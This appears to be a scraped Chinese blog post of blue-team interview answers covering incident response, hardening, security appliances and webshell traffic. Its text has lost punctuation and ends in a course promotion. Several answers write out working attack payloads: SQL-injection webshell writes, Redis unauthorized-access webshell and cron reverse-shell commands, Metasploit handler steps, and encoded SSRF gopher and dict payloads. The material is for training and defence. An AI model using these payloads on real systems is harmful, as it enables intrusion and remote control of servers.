企业官网建设流程全解析

贸易公司寮步网站建设极致发烧,网站开发什么语言安全,备案的网站可以改域名吗,线上推广服务2022年蓝队初级护网测试总结 文章目录 2022年蓝队初级护网测试总结一. 设备误报如何处理#xff1f;二. 如何区分扫描流量和手工流量#xff1f;三. 网站被上传webshell如何处理#xff1f;四. 给你一个比较大的日志#xff0c;应该如何分析#xff1f;五. 常见OA系统二. 如何区分扫描流量和手工流量三. 网站被上传webshell如何处理四. 给你一个比较大的日志应该如何分析五. 常见OA系统六. 了解安全设备吗七. 了解过系统加固吗八. 有没有安全设备的使用经验九. CS是什么东西知道怎么使用吗十. WAF方面有没有了解过清楚WAF的分类和原理吗十一. Powershell了解过吗十二. MSF是什么知道怎么使用吗十三. 使用过什么XSS平台吗十四. SQL注入怎么写入webshell十五. 了解过反序列化漏洞吗十六. 常见的框架漏洞十七.了解过redis数据库和常见的漏洞吗十八. SSRF怎么结合Redis相关漏洞利用gopher协议利用redis未授权访问漏洞写入webshell十九. windows应急响应时排查分析的相关细节可疑账号排查 lusrmgr.msc可疑进程和服务排查 taskmgr services.msc可疑启动项排查 msconfig可疑文件排查恶意样本排查二十. 常见的webshell连接工具流量一. 设备误报如何处理答来自外网的误报说明安全设备需要进行策略升级不需要处置。如果是来自内网的误报可以和负责人协商一下看能不能解决有必要的话添加白名单处理。二. 如何区分扫描流量和手工流量答1.扫描流量数据量大请求流量有规律可循且频率较高手工流量请求少间隔略长2.使用工具扫描的流量一般在数据包中有相关特征信息比如说通过wireshark网络封包分析工具对流量进行一个具体的排查分析比如通过http contains xxx来查找数据包中的关键字。比如常用的漏洞扫描工具AWVSNessus以及APPscan在请求的URLHeaders, Body三项里随机包含了能代表自己的特征信息。三. 网站被上传webshell如何处理答1.首先关闭网站下线服务。有必要的话将服务器断网隔离。2.手工结合工具进行检测。工具方面比如使用D盾webshellkill河马webshell查杀百度在线webshell查杀等工具对网站目录进行排查查杀如果是在护网期间可以将样本备份再进行查杀。手工方面对比未上传webshell前的备份文件从文件甚至代码层面进行对比检查有无后门程序或者其他异常文件实在不行就直接用备份文件替换了。4.加强安全策略比如定期备份网站配置文件及时安装服务器补丁定期更新组件以及安全防护软件定期修改密码等等措施。四. 给你一个比较大的日志应该如何分析答攻击规则匹配通过正则匹配日志中的攻击请求统计方法统计请求出现次数次数少于同类请求平均次数则为异常请求白名单模式为正常请求建立白名单不在名单范围内则为异常请求HMM 模型类似于白名单不同点在于可对正常请求自动化建立模型从而通过正常模型找出不匹配者则为异常请求使用日志分析工具如LogForensicsGraylogNagiosELK Stack等等五. 常见OA系统答PHP通达OA、泛微 EofficeJava泛微OA/云桥、致远OA、蓝凌OA、用友OAASP启莱OA六. 了解安全设备吗答入侵防御系统IPS是计算机网络安全设施是对防病毒软件和防火墙的补充。入侵预防系统是一部能够监视网络或网络设备的网络数据传输行为的计算机网络安全设备能够即时的中断、调整或隔离一些不正常或是具有伤害性的网络数据传输行为。入侵检测系统IDS积极主动的防护措施按照一定的安全策略通过软件硬件对网络系统的运行进行实时的监控尽可能地发现网络攻击行为积极主动的处理攻击保证网络资源的机密性完整性和可用性。防火墙防火墙是位于两个(或多个)网络间实行网络间访问或控制的一组组件集合之硬件或软件。隔离网络制定出不同区域之间的访问控制策略来控制不同信任程度区域间传送的数据流。数据库审计系统是对数据库访问行为进行监管的系统通过镜像或者探针的方式采集所有数据库的访问流量并基于SQL语法语义的解析技术记录下对数据库所有访问和操作行为例如访问数据的用户IP账号时间等等对数据进行操作的行为等等。日志审计系统日志审计系统能够通过主被动结合的手段实时且不间断的采集用户网络中不同厂商的安全设备网络设备主机操作系统以及各种应用系统产生的海量日志信息并将这些信息汇集到审计中心进行集中化存储备份查询审计告警响应并出具丰富的报表报告获悉全网的整体安全运行态势同时满足等保关于安全管理中心的日志保存时间大于6个月的要求。堡垒机是针对内部运维人员的运维安全审计系统。主要功能是对运维人员的运维操作进行审计和权限控制(比如要登录某些平台或者系统只能通过堡垒机才可以不用堡垒机是无法访问的)。同时堡垒机还有账号集中管理单点登录(在堡垒机上登录即可实现对多个其他平台的无密登录)等功能。漏洞扫描系统漏洞扫描工具或者设备是基于漏洞数据库通过扫描等手段对指定的远程或本地计算机系统的安全脆弱性进行检测发现可利用漏洞的一种安全检测系统(我们常用的针对WEB站点进行扫描的工具和此处漏洞扫描系统不是一个概念)。数据安全态势感知平台以大数据平台为基础通过收集多元异构的海量日志利用关联分析机器学习威胁情报可视化等技术帮助用户持续监测网络安全态势实现从被动防御向积极防御的进阶。终端安全管理系统是集防病毒终端安全管控终端准入终端审计外设管控EDR等功能于一体兼容不同操作系统和计算机平台帮助客户实现平台一体化功能一体化数据一体化的终端安全立体防护。WAFWAF是以网站或应用系统为核心的安全产品通过对HTTP或HTTPS的Web攻击行为进行分析并拦截有效的降低网站安全风险。产品主要部署在网站服务器的前方。通过特征提取和分块检索技术进行模式匹配来达到过滤分析校验网络请求包的目的在保证正常网络应用功能的同时隔绝或者阻断无效或者非法的攻击请求。蜜罐蜜罐是一种安全威胁的主动防御技术它通过模拟一个或多个易受攻击的主机或服务来吸引攻击者捕获攻击流量与样本发现网络威胁提取威胁特征蜜罐的价值在于被探测攻陷。七. 了解过系统加固吗答账户安全windows比如设置登录时不显示上次登录的用户名防止弱口令爆破。设置账户锁定策略比如说登录行为限制次数达到次数后锁定多长时间。linux禁用root之外的超级用户 使用password -l 用户名命令来锁定用户 -u解锁限制普通用户使用sudo提权或者说限制提权的权限大小锁定系统中多余的自建账号设置账户锁定登录失败锁定次数锁定时间 faillog -u 用户名命令来解锁用户口令安全windows设置密码必须符合复杂性要求比如设置时数字大写字母小写字母特殊字符都要具备设置最小密码长度不能为0设置不能使用历史密码linux检查shadow中空口令账号修改口令复杂度设置密码有效期vim /etc/login.def命令服务与端口收敛关闭或者限制常见的高危端口比如说22端口(SSH)23端口(Telnet)3389端口(RDP)compmgmt.msc排查计划任务linux上iptables封禁IP或者限制端口文件权限管理linux上chmod修改文件权限 chattr重要文件设置不可修改权限系统日志审计linux上设置系统日志策略配置文件系统日志 /var/log/messagecron日志/var/log/cron安全日志/var/log/secure设备和网络控制比如在涉密计算机上禁止访问外网为了避免用户绕过策略可以禁止用户修改IP删除默认路由配置避免利用默认路由探测网络禁止使用USB设备比如U盘禁止ping命令即禁用ICMP协议访问不让外部ping通服务器八. 有没有安全设备的使用经验答态势感知或者说安全运营方面开源项目OSSIM。IPS(入侵防御系统)方面Snort和安全洋葱Security Onion。防火墙方面TinyWall和ClearOS或者说像火绒腾讯安全管家等一些常规的防护软件。WAFWeb应用防火墙 方面ModSecurity和网站安全狗以及宝塔。威胁情报方面MISP和OpenCTI。漏洞扫描方面OpenVAS针对web站点的漏洞扫描工具使用过AWVSNessus堡垒机方面JumpServer(linux系统安装但可以添加windows主机作为资产)。蜜罐方面T-Pot(基于Linux系统安装)和微步的Hfish。九. CS是什么东西知道怎么使用吗答简介CobaltStrike是一款渗透测试工具被业界人称为CS。CobaltStrike分为客户端与服务端服务端是一个客户端可以有多个可用于团队分布式协同操作。功能CobaltStrike 集成了端口转发服务扫描自动化溢出多模式端口监听windows exe 木 马生成windows dll 木马生成java 木马生成office 宏病毒生成木马捆绑。钓鱼攻击等功能。使用一般使用步骤就是先启动服务端然后启动客户端连接获得一个可视化的界面新建监听器来接收会话生成木马文件(常见.exe可执行文件office宏病毒html应用程序类型的后门文件)上传到受害者主机当受害者运行该木马文件时目标主机就在CS上线了。十. WAF方面有没有了解过清楚WAF的分类和原理吗答分类WAF分为非嵌入型WAF和嵌入型WAF非嵌入型指的是硬WAF、云WAF、虚拟机WAF之类的嵌入型指的是web容器模块类型WAF、代码层WAF。原理Web应用防火墙是通过执行一系列针对HTTP或者HTTPS的安全策略来专门为Web应用提供保护的一款产品。WAF对请求的内容进行规则匹配、行为分析等识别出恶意行为并执行相关动作这些动作包括阻断、记录、告警等。十一. Powershell了解过吗答简介PowerShell 是一种命令行外壳程序和脚本环境主要用于Windows计算机方便管理员进行系统管理并有可能在未来取代Windows上的默认命令提示符。PowerShell脚本因其良好的功能特性常用于正常的系统管理和安全配置工作。使用常见的操作 pwd ls cd mkdir rmget-process获取所有进程信息get-date获取当前时间信息get-host获取当前主机信息然后就是使用PowersSploit(基于Powershell的后渗透框架软件包括了很多Power shell攻击脚本主要用于渗透中的信息收集权限提升权限维持)的时候在Powshell上使用过一些下载和运行攻击脚本的命令。十二. MSF是什么知道怎么使用吗答简介Metasploit Framework(MSF)是一款开源安全漏洞检测工具附带数千个已知的软件漏洞并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。模块Auxiliary辅助模块为渗透测试信息搜集提供了大量的辅助模块支持Exploits攻击模块利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击从而获得对远程目标系统访问权的代码组件。Payload攻击载荷模块攻击成功后促使靶机运行的一段植入代码Post 后渗透攻击模块收集更多信息或进一步访问被利用的目标系统Encoders编码模块将攻击载荷进行编码来绕过防护软件拦截使用首先利用Auxiliary辅助探测模块扫描嗅探指纹识别相关漏洞然后确认漏洞存在使用Exploit漏洞利用模块对漏洞进行利用包括设置payload攻击载荷设置本机监听等等。漏洞利用成功目标主机就会通过设置的端口主动连接产生会话。进而可以进行后渗透。功能木马免杀抓取用户密码关闭杀毒软件屏幕截图新建账号远程登录迁移进程提权操作网络嗅探端口转发 内网代理内网扫描生成后门清除日志等等。十三. 使用过什么XSS平台吗答1.清华蓝莲花战队的BlueLotus。2.xss-platform平台。2.kali中的beef平台。3.利用工具Postman。十四. SQL注入怎么写入webshell答条件1、知道web绝对路径2、有文件写入权限(一般情况只有ROOT用户有)3、数据库开启了secure_file_priv设置然后就能用select into outfile写入webshell常见手法联合注入写入?id1’ union select 1,“?php eval($\\\_POST\\\[shell\\\]);?”,3 into outfile ‘C:\phpstudy\WWW\sqli\shell.php’#dumpfile函数写入?id1’ union select 1,“?php eval($\\\_POST\\\[shell\\\]);?”,3 into dumpfile ‘C:\phpstudy\WWW\sqli\shell.php’#lines terminated by 写入?id1 into outfile ‘C:/wamp64/www/shell.php’ lines terminated by ‘?php phpinfo()?’;//lines terminated by 可以理解为 以每行终止的位置添加 xx 内容。lines starting by 写入?id1 into outfile ‘C:/wamp64/www/shell.php’ lines starting by ‘?php phpinfo()?’;//利用 lines starting by 语句拼接webshell的内容。lines starting by 可以理解为 以每行开始的位置添加 xx 内容。fields terminated by 写入?id1 into outfile ‘C:/wamp64/www/work/shell.php’ fields terminated by ‘?php phpinfo() ?’;//利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。columns terminated by 写入?id1 into outfile ‘C:/wamp64/www/shell.php’ COLUMNS terminated by ‘?php phpinfo() ?’;//利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。sqlmap写入写(要写的文件必须在kali本机里有)写入到 /tmp 目录下sqlmap -u “http://127.0.0.1/index.php?pageuser-info.phpusernamea%27f%27vpasswordafvuser-info-php-submit-buttonViewAccountDetails” -p ‘username’ --file-write“shell.php” --file-dest“/tmp/shell.php”十五. 了解过反序列化漏洞吗答原理序列化是指程序将对象转化为字节序列从而便于存储运输的一种方式反序列化则与其相反即将字节序列转化为对象供程序使用。程序在进行反序列化时会调用一些函数比如常见的PHP反序列化函数unserialize()以及一些常见的魔术方法比如构造函数_construct()析构函数_destruct()_wakeup()_toString()_sleep()等等。如果这些函数在传递参数时没有进行严格的过滤措施那么攻击者就可以构造恶意代码并将其序列化后传入函数中从而导致反序列化漏洞。Java反序列化Java反序列化就是将java对象转化为字节序列的过程。反序列化的过程就是1创建一个对象输出流2通过对象输出流的ReadObject()方法来读取对象十六. 常见的框架漏洞答log4j远程代码执行漏洞原理Log4j 是Apache 的一个开源项目是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到${后以:号作为分割将表达式内容分割成两部分前面一部分prefix后面部分作为key然后通过prefix去找对应的lookup通过对应的lookup实例调用lookup方法最后将key作为参数带入执行引发远程代码执行漏洞。具体操作在正常的log处理过程中对**${**这两个紧邻的字符做了检测一旦匹配到类似于表达式结构的字符串就会触发替换机制将表达式的内容替换为表达式解析后的内容而不是表达式本身从而导致攻击者构造符合要求的表达式供系统执行Fastjson反序列化漏洞判断正常请求是get请求并且没有请求体可以通过构造错误的POST请求即可查看在返回包中是否有fastjson这个字符串来判断。原理fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能在请求过程中我们可以在请求包中通过修改type的值来反序列化为指定的类型而fastjson在反序列化过程中会设置和获取类中的属性如果类中存在恶意方法就会导致代码执行等这类问题。无回显怎么办1.一种是直接将命令执行结果写入到静态资源文件里如html、js等然后通过http访问就可以直接看到结果2.通过dnslog进行数据外带但如果无法执行dns请求就无法验证了3.直接将命令执行结果回显到请求Poc的HTTP响应中Shiro反序列化漏洞原理Shiro是Apache下的一个开源Java安全框架执行身份认证授权密码和会话管理。shiro在用户登录时除了账号密码外还提供了可传递选项remember me。用户在登录时如果勾选了remember me选项那么在下一次登录时浏览器会携带cookie中的remember me字段发起请求就不需要重新输入用户名和密码。判断1.数据返回包中包含rememberMedeleteMe字段。2.直接发送原数据包返回的数据中不存在关键字可以通过在发送数据包的cookie中增加字段****rememberMe然后查看返回数据包中是否存在关键字。shiro-550shiro反序列化漏洞利用有两个关键点首先是在shiro1.2.4时AES加密的密钥Key被硬编码在代码里只要能获取到这个key就可以构造恶意数据让shiro识别为正常数据。另外就是shiro在验证rememberMe时使用了readObject方法readObject用来执行反序列化后需要执行的代码片段从而造成恶意命令可以被执行。攻击者构造恶意代码并且序列化AES加密base64编码后作为cookie的rememberMe字段发送。Shiro将rememberMe进行编码解密并且反序列化最终造成反序列化漏洞。shiro-721不需要key利用Padding Oracle Attack构造出RememberMe字段后段的值结合合法的Remember。十七.了解过redis数据库和常见的漏洞吗答redis是一个非关系型数据库使用的默认端口是6379。常见的漏洞是未授权访问漏洞攻击者无需认证就可以访问内部数据。利用手段主要有1.向root权限账户写入ssh公钥文件直接免密登录服务器。(受害者redis非root权限运行会报错)条件服务器存在.ssh目录且具有写入的权限原理在数据库中插入一条数据将本机的公钥作为valuekey值随意然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys把缓冲的数据保存在文件里这样就可以在服务器端的/root/.ssh下生成一个授权的key。2.写入webshell条件已知web绝对路径。步骤redis -cli -h 192.168.x.x 连接目标服务器config set dir “/var/www/html” 设置保存文件路径config set dbfilename shell.php 设置保存文件名set x “\n\n?php eval($\\\_POST\\\[cmd\\\]); ?\n” 将webshell写入x键值中save 保存局限1.服务器处于内网写入webshell后我们的公网IP无法连接2.服务器IP地址不固定3.6379端口不允许入方向4.上传webshell可能直接被杀毒软件删除3.反弹连接shell设置监听端口常用的工具1.msf 2.netcat 3.socat利用msf设置监听步骤use exploit/multi/handlerset payload generic/shell_reverse_tcpset lhost 192.168.x.x 默认监听端口为4444run4.定时任务反弹shell步骤定时任务用的表达式 Cron表达式是一个字符串该字符串由6个空格分为7个域每一个域代表一个时间含义。分 时 天 月 周 user-name(用户) command(命令) 比如每过一分钟向root用户的定时任务中写入反弹连接命令(1) config set dir /var/spool/cron/ //目录切换到定时任务的文件夹中(2) config set dbfilename root //设置保存文件名(3)set x “\n * * * * * bash -i /dev/tcp/192.168.96.222/7777 01\n” //将反弹shell写入x键值中(4)save //保存利用定时任务反弹shell在目标系统是Centos上可用Ubuntu上有限制理由如下1.默认redis写文件后是644的权限但ubuntu要求执行定时任务件/var/spool/cron/crontabs/权限必须是600也就是-rw-------才会执行否则会报错而Centos的定时任务文件权限644也能执行2.redis保存RDB会存在乱码在Ubuntu上会报错而在Centos上不会报错3.两个系统的定时任务文件目录不同利用主从复制getshell条件版本(4.x~5.0.5)原理数据读写体量很大时为了减轻服务器的压力redis提供了主从模式主从模式就是指定一个redis实例作为主机其余的作为从机其中主机和从机的数据是相同的而从机只负责读主机只负责写。通过读写分离可以减轻服务器端的压力。利用工具RedisRogueServer地址https://github.com/n0b0dyCN/redis-rogue-server使用工具的命令python3 redis-rogue-server.py --rhostx.x.x.x --lhostx.x.x.x --expexp.so两种使用方法交互式反弹式限制利用这个方法getshell或者rce任意导致redis服务瘫痪一般不建议使用redis未授权访问漏洞的防范措施1.添加登录密码2.修改默认端口3.关闭端口4.禁止以root用户权限启动以低权限启动redis服务十八. SSRF怎么结合Redis相关漏洞利用答主要通过两种协议dict协议和gopher协议。dict协议利用redis相关漏洞探测端口ssrf.php?urldict://x.x.x.x: 端口 端口 端口 利用burpsuite爆破端口探测是否设置弱口令ssrf.php?urldict://x.x.x.x:6379/info 已知端口利用info探测是否设置了密码爆破密码ssrf.php?urldict://x.x.x.x:6379/auth: 密码 密码 密码 利用burpsuite爆破密码写入webshellurldict://xxx.xxx:6379/config:set:dir:/var/www/html 切换文件目录urldict://xxx.xxx:6379/config:set:dbfilename:webshell.php 设置保存文件名urldict://xxx.xxx:6379/set:webshell:“\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e” //利用dict协议写入webshell 以上的字符编码是?php phpinfo();?的十六进制urldict://x.x.x.x:6379/save 保存urldict://xxx.xxx:6379/config:set:dir:/var/www/html 切换文件目录urldict://xxx.xxx:6379/config:set:dbfilename:webshell.php 设置保存文件名urldict://xxx.xxx:6379/set:webshell:“\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e”//利用dict协议写入webshell 以上的字符编码是?php phpinfo();?的十六进制4.ssrf.php?urldict://x.x.x.x:6379/save 保存dict协议利用计划任务反弹shell或者写入ssh公钥的手段类似gopher协议利用redis未授权访问漏洞写入webshell常规利用步骤set x “\n\n\n?php eval($\\\_POST\\\[redis\\\]);?\n\n\n”config set dir /var/www/htmlconfig set dbfilename shell.phpsave两次url编码后构造urlhttp://192.168.1.1/ssrf.php?urlgopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%30%25%32%30%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35//第一次url解码和第二次url解码//同理其他类似计划任务反弹和写入ssh公钥等getshell方式相似十九. windows应急响应时排查分析的相关细节答可疑账号排查 lusrmgr.msc1.检查服务器是否有弱口令。比如空口令或者密码复杂度不够。2.高危端口是否对外开放比如SSH服务22端口RDP服务3389端口等。3.查看服务器是否有可疑账号。手工方面lusrmgr.msc命令查看用户和组查看是否有新增账号隐藏账号克隆账号。工具方面比如利用D盾等工具来检测隐藏账号。4.结合日志分析 eventvwr.msc 查看管理员登录时间相关事件是否有异常。敏感事件ID4624 登录成功4625 登录失败4672 使用超级管理员进行登录4720 创建用户5.使用query user查看当前系统的会话比如查看是否有人使用远程登录服务器。可疑进程和服务排查 taskmgr services.msc1.查看CPU内存网络等资源是否有可疑状况。比如CPU占用率过高可能是中了挖矿病毒磁盘空间大量占用可能是脚本或病毒大量生成和复制隐藏文件。2.检查进程名某些进程名是大量随机的情况比如hrlC3.tmp、hrlD5.tmp、hrl6.tmp、hrlEE.tmp等多个名字相似的进程基本上可以断定是异常进程。异常进程名伪装成系统进程或者说常见服务的进程名此时可以通过进程描述来判断并且需要手工对比。3.检查进程和服务描述修改时间或者数字签名是否有异常。4.利用工具进行检测比如Process Hunter或者火绒剑等专门针对进程服务信息的排查分析工具主要查看的是公司名描述安全状态和启动类型等方面来排查。可疑启动项排查 msconfigmsconfig或者任务管理器中的启动项查看名称发布者和启动影响以及右键查看属性来看数字签名和修改时间。结合工具进行排查比如火绒剑等工具会将启动项分类为登录驱动程序计划任务映像劫持等利用分析排查可疑文件排查1.各个磁盘的Temp/tmp目录中是Windows产生的临时文件查看有无异常文件。2.Recent目录会记录最近打开的文档以及程序的相关记录。3.查看文件的创建时间修改时间和访问时间比如说攻击者利用菜刀等工具对文件进行修改会改变修改时间如果修改时间在创建时间之前那就是很明显的可疑文件。4.windows系统我的电脑快速访问可以看到最近使用的文件比如说图片或者压缩包等文件的使用历史和文件路径都会显示。恶意样本排查1.恶意样本指的一般是webshell病毒木马或者后门程序或文件可以根据设备的告警信息来查找相关路径再排查相关的进程和启动项。2.不知道路径的话可以利用相关的安全设备来进行检测比如说通过D盾河马查杀等工具对webshell可能存在的目录进行一个排查查杀利用常规的防火墙软件来对全盘或者可疑目录扫描病毒。二十. 常见的webshell连接工具流量答中国菜刀连接过程中使用base64编码对发送的指令进行加密其中两个关键payload z1 和 z2名字都是可变的。然后还有一段以QG开头7J结尾的固定代码。蚁剑默认的user-agent请求头是antsword xxx不过可以修改。一般将payload进行分段然后分别进行base64编码一般具有像eval这样的关键字然后呢大概率还有ini_set(“display”,“0”);这段代码。冰蝎php代码中可能存在evalassert等关键词jsp代码中可能会有getclass()getclassLoader()等字符特征。冰蝎2.0第一阶段请求中返回包的状态码是200返回内容是16位的密钥。建立连接后的cookie格式都是CookiePHPSessidxxxx path/特征。冰蝎3.0请求包中的conten-length字段是5740或者5720然后请求头也具有特征信息不过这个比较长没有记住。哥斯拉1.jsp代码中可能会具有getclassgetclassLoader等关键字payload使用base64编码等特征。php和asp则是普通的一句话木马。2.在响应包的cache-control字段中有no-storeno-cache等特征。3.所有请求中的cookie字段最后面都存在特征学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源